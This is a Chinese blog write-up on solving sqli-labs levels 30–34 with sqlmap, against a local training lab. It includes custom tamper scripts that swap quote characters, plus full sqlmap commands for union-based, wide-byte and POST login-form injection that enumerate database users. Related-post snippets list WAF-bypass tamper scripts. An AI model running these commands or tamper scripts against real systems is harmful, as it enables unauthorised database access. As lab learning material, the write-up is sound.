SQLMAP脚本-sql-labs-Less-30-34

已于 2023-01-04 15:30:01 修改
阅读量408 收藏 1
点赞数
文章标签: sql 数据库 网络安全 python less
于 2023-01-04 12:02:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69844818/article/details/128542861
版权

Less- 30

和上一关一样先使用上一关的脚本跑一下 

 发现跑不出来了,看一下后端代码

 按道理只是把单引号换成了双引号,sqlmap应该是会尝试双引号注入
但我怎么跑都跑步出来,尝试在脚本里面手动替换双引号

代码如下

#!/usr/bin/env python
import sys
import random
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
	str_list = list(payload)
	str_list.insert(0, '&id=')
	payload = ''.join(str_list)
	payload = payload.replace("'", '"')
	return payload

 python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-30/?id=1" --technique=U --users --tamper=cx.py,air.py 再次尝试注入

 

 还是失败,感觉是插入前面的问题了,那直接这样子注入

#!/usr/bin/env python
import sys
import random
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW


def tamper(payload, **kwargs):
	payload = payload.replace("'", '"')
	return payload

 注入成功

 就挺奇怪的如果不用手动替换双引号跑不出来?
尝试一下使用level参数
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-30/?id=1" --technique=U --users --tamper=air.py --level=2 #就跑出来了...,还是多使用一些它自带的参数吧..

  Less-31

 python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-31/?id=1" --technique=U --users --tamper=air.py --level=2 直接跑就行了


只是换了闭合方式,使用")来闭合

 Less-32

 这关是一个宽字节注入,sqlmap有自带的脚本注入,unmagicquotes.py

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

将单引号,双引号转换为了\\
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-32/?id=1" --technique=U --users --tamper=unmagicquotes.py,air.py --level=3 #我这里是gbk编码

 Less-33

 和上一关一样只不过后端把使用的函数替换成了addslashe函数
函数返回在预定义字符之前添加反斜杠的字符串。
单引号(’)
双引号(")
反斜杠(\)
NULL

python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-32/?id=1" --technique=U --users --tamper=unmagicquotes.py,air.py --level=3 #直接跑就行了

Less-34

 是个登录框注入也是宽字节,得先抓包

执行命令

python3 ./sqlmap.py  "http://172.17.0.1/Less-34/" -p uname --technique=U --users --tamper=unmagicquotes.py,air.py --level=5 --data="uname=admin&passwd=admin&submit=Submit" #这里前三个选项要选n

  

小恐龙观铃
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap脚本
03-08
sqlmap绕过安全狗脚本 源自github sqlmap绕过安全狗脚本 来源自github
tamper绕WAF详解
weixin_34112208的博客
06-16 851
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophem...
SQLmap绕过waf的脚本详解
一杯咖啡的渗透记忆
11-15 1921
使用方法--tamper xxx.py apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py 在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 bet...
SQLMAP脚本-sql-labs-Less-41-45
m0_69844818的博客
01-06 132
首先忘记说unmagicquotes.py的写法了,真变成为了使用脚本而使用脚本了...
sqlmap自动化脚本
03-27
自己用批处理写的一个sqlmap脚本,不用看手册输命令行了 大部分参数均可设置,也可以自己输入其他参数
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
sqlmap.py 脚本 sqlmap-master.zip
10-16
sqlmap脚本,解压后可直接运行 列几个基本命令 ./sqlmap.py –h //查看帮助信息 ./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入 ./sqlmap.py –u ...
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
iBATIS-SqlMaps-2_ja.pdf
06-08
iBATIS-SqlMaps-2_ja说明资料
sqlmap的一些脚本的使用,绕过滤的神器
11-26
sql注入神奇,搭配各种脚本,花式绕过滤,懂的人自然懂,哈哈,欢迎下载
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
sqlmap过waf脚本及目录介绍
MzHeader的博客
05-22 1061
sqlmap 的源码学习笔记一之目录结构 0x00 前言 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。本文重点研究sqlmap的软件具体的目录结构,后续的文章也会从源码编写中,...
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本
热门推荐
Love&Share
12-29 1万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 389
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单写就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么写脚本提供思路。使用双写union绕过,编写cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1348
sqlmap脚本sqli-labs
sqlmap的高级使用-tamper脚本使用、os-shell原理等
weixin_46626737的博客
07-11 675
(10)concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例。(5)between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=(14)ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例。
SQLMap的Tamper脚本
m0_62207482的博客
01-31 2021
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本。Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
sqlmap --banner
最新发布
03-16
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它可以通过发送特制的SQL语句来探测和利用目标应用程序中的SQL注入漏洞,从而获取敏感信息、绕过认证、执行任意代码等。 --banner参数是SQLMap的一个选项,用于显示SQLMap的标志性横幅信息。当你在命令行中输入"sqlmap --banner"时,SQLMap会显示其版本号、作者、许可证等基本信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值